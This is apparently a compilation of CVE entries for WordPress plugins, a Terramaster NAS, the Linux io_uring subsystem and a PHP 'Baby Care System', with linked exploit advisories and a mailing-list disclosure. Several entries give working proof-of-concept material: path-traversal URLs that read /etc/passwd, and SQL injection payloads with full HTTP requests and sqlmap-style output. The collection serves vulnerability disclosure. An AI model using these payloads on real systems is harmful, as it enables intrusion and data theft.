The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.

CVE-2021-25094

The Donations WordPress plugin through 1.8 does not sanitise and escape the nd_donations_id parameter before using it in a SQL statement via the nd_donations_single_cause_form_validate_fields_php_function AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection

CVE-2022-0782

The Cab fare calculator WordPress plugin through 1.0.3 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

    # Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - LocalFile Inclusion - Unauthenticated# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/# Version: 1.0.3# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable File: tblight.php# Vulnerable Code:```if(!empty($_GET['controller']) && !empty($_GET['action']) &&!empty($_GET['ajax']) && $_GET['ajax'] == 1){    require_once('' . 'controllers/'.$_GET['controller'].'.php');}```# Proof of concept:http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1># POC image:https://prnt.sc/9O8_akDp2HPC

CVE-2022-1391: WordPress Cab-Fare-Calculator 1.0.3 Local File Inclusion ≈ Packet Storm

The Admin Word Count Column WordPress plugin through 2.2 does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique

    # Exploit Title: WordPress Plugin admin-word-count-column 2.2 - LocalFile Download# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/# Date: 27-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage:https://wordpress.org/plugins/admin-word-count-column/<https://wordpress.org/plugins/video-synchro-pdf/># Version: 2.2# Contact me: h [at] spidersilk.com# PHP version: 5.3.2 or below# Vulnerable File: plugins/admin-word-count-column/download-csv.php# Vulnerable Code:```<?phpdate_default_timezone_set('America/Los_Angeles');$csvdate = date('Md-H-i-s-T');$csvname = 'wordcounts-' . $csvdate . '.csv';header('Content-Type: application/csv');header('Content-Disposition: attachment; filename=' . $csvname);header('Pragma: no-cache');readfile($_GET['path'] . 'cpwc.csv');?>```# Proof of Concept:localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.

CVE-2022-1390: WordPress Admin Word Count Column 2.2 Local File Inclusion ≈ Packet Storm

The Donorbox WordPress plugin before 7.1.7 does not sanitise and escape its Campaign URL settings before outputting it in an attribute, leading to a Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed

    # Exploit Title: WordPress Plugin donorbox-donation-form 7.1.6 -Stored Cross Site Scripting (Authenticated)# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage:https://wordpress.org/plugins/donorbox-donation-form<https://wordpress.org/plugins/amministrazione-aperta/># Version: 7.1.6# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:```public function donorbox_embed_campaign_id_settings() { ?>        <inputname="donorbox_embed_campaign_options[donorbox_embed_campaign_id]"type="text" value="<?php echo $this->options['donorbox_embed_campaign_id'];?>" class="regular-text" />        <?php    }```# POC1) Install donorbox-donation-form<https://wordpress.org/plugins/amministrazione-aperta/> WordPress plugin2)Open donorbox plugin settings3) Inject payload in URL field4) XSS will trigger.# Timeline21/03/2022 - Vendor notified24/03/2022 - Fix / patch24/03/2022 - CVE Requested29/03/2022 - Public disclosure

CVE-2022-1396: WordPress Donorbox-Donation-Form 7.1.6 Cross Site Scripting ≈ Packet Storm

In Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517), an attacker can self-sign session cookies by knowing the target's MAC address and the user's password hash. Guest users (disabled by default) can be abused using a null/empty hash and allow an unauthenticated attacker to login as guest.

CVE-2021-45841: How to summon RCEs

In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 22 Apr 2022 02:43:27 +0200
From: David Bouman <dbouman03@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux: UaF due to concurrency issue in io\_uring timeouts

Hello list,

We (Jayden Rivers and David Bouman) are disclosing a bug we found in the 
Linux kernel's io\_uring subsystem. We have written a local privilege 
escalation PoC that can successfully elevate to system root from an 
unprivileged process (in a container). We will be releasing a blog post 
(including exploit code) in a week or two. It should be noted that 
unlike many Linux vulnerabilities that have surfaced recently, 
triggering this one does not require an attacker to have any kind of 
privileges (e.g. in a user namespace). This leaves many systems vulnerable.

We are still looking for a CNA representative that can assign a CVE 
number for this vulnerability; please contact us!

Kernel versions 5.10+ are affected, and linux-stable patches are already 
pushed. The upstream patch commit is 
e677edbcabee849bfdd43f1602bccbecf736a646 ("io\_uring: fix race between 
timeout flush and removal").

When the IORING\_OP\_TIMEOUT (T) and IORING\_OP\_LINK\_TIMEOUT (LT) opcodes 
are combined in a linked submission queue entry, and another request (B) 
finishes, a race might occur: namely, when due to the completion of B, T 
is cancelled (through the completion event count), and LT is canceled by 
its hrtimer at the same time. Whilst T is still being cleaned up, LT is 
already freed by a different execution context, and since they are 
linked, the cleanup of T retains a dangling reference to the now-freed 
LT. Hence, there's a use-after-free.

Exploitation-wise, the attacker can reallocate LT to another \`struct 
io\_kiocb\` and defer the UaF to e.g. a \`struct file\` (this is the 
technique we will describe in aforementioned blog post).

The race window is quite tight and the scenario is complicated, so the 
race can only be won very infrequently in our experience.

It is advised to upgrade your kernel to latest ASAP.

Greetings,

Jayden Rivers & David Bouman

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-29582: security - Linux: UaF due to concurrency issue in io_uring timeouts

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=edit.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=edit

Vulnerability location: /BabyCare/admin.php?id=posts&action=edit&postid=2 //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=edit&postid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=edit&postid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=posts&action\=edit&postid\=2' AND 7502=7502 AND 'Yurq'\='Yurq

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 6867 FROM(SELECT COUNT(\*),CONCAT(0x7162786a71,(SELECT (ELT(6867=6867,1))),0x7170767071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'huoz'\='huoz

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 5804 FROM (SELECT(SLEEP(5)))ZBUN) AND 'nxGO'\='nxGO

    Type: UNION query
    Title: Generic UNION query (NULL) \- 8 columns
    Payload: id\=posts&action\=edit&postid\=\-9180' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786a71,0x4e436b74735063624a4164484d4f675676736e68467951525141677146614f56476b524f66456f50,0x7170767071),NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28422: bug_report/SQLi-3.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via BabyCare/admin.php?id=theme&setid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/theme.php

Vulnerability location: BabyCare/admin.php?id=theme&setid= //setid is Injection point

\[+\]Payload: setid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ //setid is Injection point

GET /BabyCare/admin.php?id\=theme&setid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: setid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=theme&setid\=1' AND 4666=4666 AND 'rScZ'\='rScZ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=theme&setid\=1' AND (SELECT 1518 FROM(SELECT COUNT(\*),CONCAT(0x7171707671,(SELECT (ELT(1518=1518,1))),0x7176717671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'KBjM'\='KBjM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=theme&setid\=1' AND (SELECT 8964 FROM (SELECT(SLEEP(5)))SZjt) AND 'pISR'\='pISR
\--\-

CVE-2022-28420: bug_report/SQLi-1.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=posts&action=display&value=1&postid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/post.php 

Vulnerability location: /BabyCare/admin.php?id=posts&action=display&value=1&postid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=display&value=1&postid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=display&value\=1&postid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=display&value\=1&postid\=1' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 1 ELSE 0x28 END))-- GiVX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&action=display&value=1&postid=1' AND (SELECT 7280 FROM(SELECT COUNT(\*),CONCAT(0x71627a7071,(SELECT (ELT(7280\=7280,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- PXXk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=display&value\=1&postid\=1' AND (SELECT 3574 FROM (SELECT(SLEEP(5)))SpIf)-- qCfa
\---

Tag

#php